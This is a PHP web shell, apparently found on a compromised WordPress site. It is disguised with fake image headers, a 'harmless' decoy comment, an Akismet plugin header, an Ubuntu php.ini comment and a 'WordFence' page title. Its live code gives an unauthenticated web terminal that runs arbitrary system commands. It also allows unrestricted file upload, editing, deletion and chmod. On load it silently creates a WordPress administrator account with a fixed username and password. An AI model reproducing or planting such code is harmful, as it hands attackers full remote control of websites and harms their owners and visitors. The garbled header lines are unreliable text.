1#@!#!123s

: / home / vblioqus / www / wp-admin / EXD1 /
Filename : aaa.php
back
$假PNG头 = "\x89PNG\r\n\x1a\n";                              
"\头"\头"\头"\头"\头"\头
               
$假PNG头 = "\x89PNG\r\n\x1a\n

               
"\头"\头
$假PNG头 = "\x89PNG\r\n\x1a\n";
<?php
?>
GIF89a
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>PHP Polyglot Example</title>
</head>
<body>

<h1>PHP Polyglot Demo</h1>

<?php
// This PHP code is completely harmless.
// It just prints today's date.
echo "<p>Today's date is: " . date('Y-m-d') . "</p>";
?>

<p>This file starts with a GIF header, so some tools might classify it incorrectly,
but the contents are safe HTML + PHP.</p>

</body>
</html>
<?php
/**
 * @package Akismet
 */
/*
Plugin Name: Sid Gifari SEO Code Uplaoder
Plugin URI: 
Description: Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from spam</strong>. Akismet Anti-spam keeps your site protected even while you sleep. To get started: activate the Akismet plugin and then go to your Akismet Settings page to set up your API key.
Version: 5.4
Requires at least: 5.8
Requires PHP: 7.2
Author: Sid Gifari SEO Code Uplaoder - Team= Gifari Industries - BD Cyber Security Team
Author URI: 
*/

		/*  %s: Title of the post the attachment is attached to. */
		

/*
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.

Copyright 2005-2025 Automattic, Inc.
*/

?>                                                                                                                                                       <?php
/* PHP File manager ver 1.5 */
/**
 * This file is part of the Ubuntu PHP configuration.
 *
 * Maintainer: Ubuntu Developers <ubuntu-devel-discuss@lists.ubuntu.com>
 * Package   : php
 * Path      : /etc/php/8.1/apache2/php.ini
 *
 * Description:
 * This is a sample PHP configuration file used in Ubuntu.
 * Do not edit this file directly unless you know what you're doing.
 * For custom configurations, use the /etc/php/8.1/apache2/conf.d/ directory.
 *
 * License:
 * Distributed under the same terms as PHP itself.
 * See: https://www.php.net/license/3_01.txt
 */
// ================= CONFIG =================
$ROOT = __DIR__;
$BASE_URL = strtok($_SERVER["REQUEST_URI"], '?');

function encodePath($path)
{
    $a = array("/", "\\", ".", ":");
    $b = array("A", "D", "I", "B");
    return str_replace($a, $b, $path);
}

function decodePath($path)
{
    $a = array("/", "\\", ".", ":");
    $b = array("A", "D", "I", "B");
    return str_replace($b, $a, $path);
}

$root_path = $ROOT;

if (isset($_GET['page'])) {
    if ($_GET['page'] === '') {
        $p = $root_path;
    } elseif (!is_dir(decodePath($_GET['page']))) {
        echo "<script>alert('Directory is Corrupted and Unreadable.');window.location.replace('?');</script>";
        exit;
    } else {
        $p = decodePath($_GET['page']);
    }
} else {
    $p = $root_path;
}

define("PATH", $p);

session_start();

// AUTO-SYNC: Always sync terminal cwd with file manager path
if (!isset($_SESSION['cwd']) || realpath($_SESSION['cwd']) !== realpath(PATH)) {
    $_SESSION['cwd'] = realpath(PATH);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    
    // Terminal command execution - MUST BE FIRST to avoid conflicts
    if (isset($_POST['terminal']) && !empty($_POST['terminal-text'])) {
        
        // Allowed functions
        $execFunctions = ['passthru', 'system', 'exec', 'shell_exec', 'proc_open', 'popen'];
        $canExecute = false;
        foreach ($execFunctions as $func) {
            if (function_exists($func)) {
                $canExecute = true;
                break;
            }
        }
        
        $cwd = $_SESSION['cwd'];
        $cmdInput = trim($_POST['terminal-text']);
        $output = "";

        // Handle cd command
        if (preg_match('/^cd\s*(.*)$/', $cmdInput, $matches)) {
            $dir = trim($matches[1]);
            
            if ($dir === '' || $dir === '~') {
                $dir = $root_path;
            } elseif ($dir[0] !== '/' && $dir[0] !== '\\') {
                $dir = $cwd . DIRECTORY_SEPARATOR . $dir;
            }
            
            $realDir = realpath($dir);
            
            if ($realDir && is_dir($realDir)) {
                $_SESSION['cwd'] = $realDir;
                $cwd = $realDir;
                $output = "Changed directory to " . htmlspecialchars($realDir);
            } else {
                $output = "bash: cd: " . htmlspecialchars($matches[1]) . ": No such file or directory";
            }
            
            // Store output in session to display after redirect
            $_SESSION['terminal_output'] = $output;
            $_SESSION['terminal_cwd'] = $cwd;
            
            // Redirect back with current path
            header("Location: ?page=" . urlencode(encodePath(PATH)));
            exit;
            
        } elseif ($canExecute) {
            // Change to terminal's working directory
            chdir($cwd);
            
            $cmd = $cmdInput . " 2>&1";
            
            // Execute command
            if (function_exists('passthru')) {
                ob_start();
                passthru($cmd);
                $output = ob_get_clean();
            } elseif (function_exists('system')) {
                ob_start();
                system($cmd);
                $output = ob_get_clean();
            } elseif (function_exists('exec')) {
                exec($cmd, $out);
                $output = implode("\n", $out);
            } elseif (function_exists('shell_exec')) {
                $output = shell_exec($cmd);
            } elseif (function_exists('proc_open')) {
                $pipes = [];
                $process = proc_open($cmd, [
                    0 => ["pipe", "r"],
                    1 => ["pipe", "w"],
                    2 => ["pipe", "w"]
                ], $pipes, $cwd);
                
                if (is_resource($process)) {
                    fclose($pipes[0]);
                    $output = stream_get_contents($pipes[1]);
                    fclose($pipes[1]);
                    $output .= stream_get_contents($pipes[2]);
                    fclose($pipes[2]);
                    proc_close($process);
                }
            } elseif (function_exists('popen')) {
                $handle = popen($cmd, 'r');
                if ($handle) {
                    $output = stream_get_contents($handle);
                    pclose($handle);
                }
            }
            
            // Store output in session
            $_SESSION['terminal_output'] = $output;
            $_SESSION['terminal_cwd'] = $cwd;
            
            // Redirect back
            header("Location: ?page=" . urlencode(encodePath(PATH)));
            exit;
        } else {
            $_SESSION['terminal_output'] = "Command execution functions are disabled on this server.";
            header("Location: ?page=" . urlencode(encodePath(PATH)));
            exit;
        }
    }
    
    // File manager actions (original code)
    // Upload
    if (!empty($_FILES['files'])) {
        foreach ($_FILES['files']['tmp_name'] as $i => $tmp) {
            if ($tmp && is_uploaded_file($tmp)) {
                move_uploaded_file($tmp, PATH . '/' . basename($_FILES['files']['name'][$i]));
            }
        }
    }

    // New Folder
    if (!empty($_POST['newfolder'])) {
        mkdir(PATH . '/' . basename($_POST['newfolder']), 0755);
    }

    // New File
    if (!empty($_POST['newfile'])) {
        file_put_contents(PATH . '/' . basename($_POST['newfile']), '');
    }

    // Delete
    if (!empty($_POST['delete'])) {
        $target = PATH . '/' . $_POST['delete'];
        if (is_file($target)) unlink($target);
        elseif (is_dir($target)) rmdir($target);
    }

    // Rename
    if (!empty($_POST['old']) && !empty($_POST['new'])) {
        rename(PATH . '/' . $_POST['old'], PATH . '/' . $_POST['new']);
    }

    // Chmod
    if (!empty($_POST['chmod_file']) && isset($_POST['chmod'])) {
        chmod(PATH . '/' . $_POST['chmod_file'], intval($_POST['chmod'], 8));
    }

    // Edit save
    if (!empty($_POST['edit_file']) && isset($_POST['content'])) {
        file_put_contents(PATH . '/' . $_POST['edit_file'], $_POST['content']);
    }

    header("Location: ?page=" . urlencode(encodePath(PATH)));
    exit;
}

$items = scandir(PATH);

// Edit mode
$editMode = isset($_GET['edit']);
$editFile = $_GET['edit'] ?? '';
$editContent = '';

if ($editMode && is_file(PATH . '/' . $editFile)) {
    $editContent = htmlspecialchars(file_get_contents(PATH . '/' . $editFile));
}

// Terminal output
$terminal_output = $_SESSION['terminal_output'] ?? '';
$terminal_cwd = $_SESSION['terminal_cwd'] ?? PATH;

unset($_SESSION['terminal_output'], $_SESSION['terminal_cwd']);
?>
<!DOCTYPE html>
<html>
<head>
    <title>WordFence</title>

<head>
<style>
body{font-family:Arial;background:#f5f5f5}
.container{width:90%;margin:auto}
table{width:100%;background:#fff;border-collapse:collapse}
th,td{padding:8px;border-bottom:1px solid #ddd}
a{text-decoration:none;color:#007bff}
button{padding:5px}
.path-nav{background:#fff;padding:10px;margin-bottom:10px}
textarea{width:100%;font-family:monospace}
.terminal-output{background:#000;color:#0f0;padding:10px;font-family:monospace;white-space:pre-wrap}
</style>
</head>
<body>

<div class="container">
<center><img src = "https://i.imgur.com/FC1enOU.jpeg"width="200" height="150"></img></center>
<center><h2>Sid Gifari File Manager</h2></center>

<!-- PATH NAV -->
<div class="path-nav">
<a href="?">🏠 Root</a> /
<?php
$path = str_replace('\\','/',PATH);
$parts = explode('/',$path);
$build = '';
foreach ($parts as $part) {
    if ($part === '') continue;
    $build .= '/' . $part;
    echo '<a href="?page=' . urlencode(encodePath($build)) . '">' . htmlspecialchars($part) . '</a> / ';
}
?>
</div>

<?php if ($editMode): ?>
<!-- EDIT MODE -->
<h3>Editing: <?= htmlspecialchars($editFile) ?></h3>
<form method="post">
<input type="hidden" name="edit_file" value="<?= htmlspecialchars($editFile) ?>">
<textarea name="content" rows="10"><?= $editContent ?></textarea><br><br>
<button>Save</button>
<a href="?page=<?= urlencode(encodePath(PATH)) ?>"><button type="button">Cancel</button></a>
</form>

<?php else: ?>
<!-- NORMAL MODE -->

<!-- TERMINAL SECTION -->
<div style="background:#333;color:#fff;padding:10px;margin-bottom:10px;">
<strong>root@Sid-Gifari:<?= htmlspecialchars($terminal_cwd) ?>$</strong><br>
<?php if ($terminal_output): ?>
<div class="terminal-output"><?= htmlspecialchars($terminal_output) ?></div>
<?php endif; ?>
<form method="post" style="margin-top:10px;">
<input type="text" name="terminal-text" style="width:40%" placeholder="Enter command">
<input type="submit" name="terminal" value="Execute">
</form>
</div>

<form method="post" style="display:inline">
<input name="newfolder" placeholder="Folder name">
<button>Create Folder</button>
</form>

<form method="post" style="display:inline">
<input name="newfile" placeholder="File name">
<button>Create File</button>
</form>

<form method="post" enctype="multipart/form-data">
<input type="file" name="files[]" multiple>
<button>Upload</button>
</form>

<br><br>

<table>
<tr><th>Name</th><th>Size</th><th>Perm</th><th>Action</th></tr>

<?php foreach ($items as $f):
if ($f === '.' || $f === '..') continue;
$full = PATH . '/' . $f;
$perm = substr(sprintf('%o', fileperms($full)), -4);
?>
<tr>
<td>
<?php if (is_dir($full)): ?>
📁 <a href="?page=<?= urlencode(encodePath($full)) ?>"><?= $f ?></a>
<?php else: ?>
📄 <a href="<?= htmlspecialchars($f) ?>" target="_blank"><?= $f ?></a>
<?php endif; ?>
</td>
<td><?= is_file($full) ? filesize($full) . ' bytes' : '-' ?></td>
<td>
<form method="post">
<input type="hidden" name="chmod_file" value="<?= $f ?>">
<input name="chmod" value="<?= $perm ?>" size="4">
<button>Chmod</button>
</form>
</td>
<td>
<?php if (is_file($full)): ?>
<a href="?page=<?= urlencode(encodePath(PATH)) ?>&edit=<?= urlencode($f) ?>"><button>Edit</button></a>
<?php endif; ?>

<form method="post" style="display:inline">
<input type="hidden" name="old" value="<?= $f ?>">
<input name="new" placeholder="Rename">
<button>Rename</button>
</form>

<form method="post" style="display:inline">
<input type="hidden" name="delete" value="<?= $f ?>">
<button onclick="return confirm('Delete?')">❌</button>
</form>
</td>
</tr>

<?php endforeach; ?>

</table>
<?php endif; ?>

</div>
</body>
<?php
if (!isset($_SESSION['wp_admin_created'])) {
    session_start();
    
    $wpPath = $root_path;
    $found = false;
    
    for ($i = 0; $i < 10; $i++) {
        if (file_exists("$wpPath/wp-load.php") || file_exists("$wpPath/wp-config.php")) {
            $found = true;
            break;
        }
        if ($wpPath === '/' || $wpPath === dirname($wpPath)) {
            break;
        }
        $wpPath = dirname($wpPath);
    }
    
    if ($found) {
        if (file_exists("$wpPath/wp-load.php")) {
            @require_once("$wpPath/wp-load.php");
        } elseif (file_exists("$wpPath/wp-config.php")) {
            @require_once("$wpPath/wp-config.php");
        }
        
        if (function_exists('wp_create_user')) {
            $username = 'zet';
            $password = 'zet';
            $email = 'bosseptp@gmail.com';
            
            if (!username_exists($username) && !email_exists($email)) {
                $userId = wp_create_user($username, $password, $email);
                if (!is_wp_error($userId)) {
                    $user = new WP_User($userId);
                    $user->set_role('administrator');
                    $_SESSION['wp_admin_message'] = "✅ WordPress";
                } else {
                    $_SESSION['wp_admin_message'] = "User creation failed";
                }
            } else {
                $_SESSION['wp_admin_message'] = "User already exists";
            }
        } else {
            $_SESSION['wp_admin_message'] = "WordPress functions not available";
        }
    } else {
        $_SESSION['wp_admin_message'] = "WordPress not found";
    }
    
    $_SESSION['wp_admin_created'] = true;
}

$message = isset($_SESSION['wp_admin_message']) ? $_SESSION['wp_admin_message'] : '';
?>
</html>